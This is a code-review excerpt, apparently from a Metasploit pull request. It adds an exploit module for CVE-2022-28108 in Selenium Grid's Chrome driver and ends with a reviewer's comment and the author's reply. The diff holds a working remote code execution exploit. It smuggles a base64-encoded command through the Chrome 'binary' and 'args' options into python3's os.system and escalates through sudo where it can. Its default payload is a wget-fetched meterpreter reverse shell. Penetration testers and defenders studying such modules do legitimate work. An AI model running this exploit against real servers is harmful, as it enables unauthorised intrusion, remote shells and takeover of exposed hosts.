modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb

```diff
@@ -0,0 +1,117 @@
+          ['CVE', '2022-28108'],
+          ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'],
+          ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
+        ],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-18',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(4444),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+    return Exploit::CheckCode::Unknown unless js_code
+
+    json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
+    json_data = JSON.parse(json_str)
+    return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
+
+    # Extract the version
+    version = Rex::Version.new(json_data['version'])
+    if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
+      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
+    end
+
+    print_status("Version #{version} detected, which is vulnerable")
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    b64encoded_payload = Rex::Text.encode_base64(
+      "if sudo -n true 2>/dev/null; then\n"\
+      "  sudo su root -c '#{payload.encoded}'\n"\
+      "else\n"\
+      "  #{payload.encoded}\n"\
+      "fi\n"
+    )
+
+    # Create the request body as a Ruby hash and then convert it to JSON
+    body = {
+      'capabilities' => {
+        'alwaysMatch' => {
+          'browserName' => 'chrome',
+          'goog:chromeOptions' => {
+            'binary' => '/usr/bin/python3',
+            'args' => ["-cimport base64,os; bp=b'#{b64encoded_payload}'; os.system(base64.b64decode(bp).decode())"]
+          }
+        }
+      }
+    }.to_json
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
+      'headers' => { 'Content-Type' => 'text/plain' },
+      'data' => body
+    })
```

Comment:
Does the server send a response? If so, the typical code pattern here is to use something like this:

```ruby
res = send_request_cgi(...)
fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, 'The target did not respond with 200 OK') unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server') unless res&.body.to_s.include?('something we expected')
```

Reply:
Thanks! The message varies between versions, so I chose the first one. https://github.com/rapid7/metasploit-framework/pull/19769/commits/6577a18abb355a307fb6c6a45fdd3b79cf25ea94